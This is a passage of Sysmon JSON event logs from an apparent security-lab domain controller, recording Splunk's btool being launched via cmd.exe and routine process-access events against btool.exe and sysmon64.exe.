2496\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.351","ProcessGuid":"{A837DB8D-0239-5F25-0000-0010DB210500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-00101C210500}","ParentProcessId":"2496","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3164,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00101C210500}\r\nSourceProcessId: 2496\r\nSourceThreadId: 3356\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010DB210500}\r\nTargetProcessId: 3364\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00101C210500}","SourceProcessId":"2496","SourceThreadId":"3356","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010DB210500}","TargetProcessId":"3364","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3165,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010DB210500}\r\nTargetProcessId: 3364\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010DB210500}","TargetProcessId":"3364","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3166,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3167,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3168,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3169,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3170,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3171,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.340","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3172,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.340\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 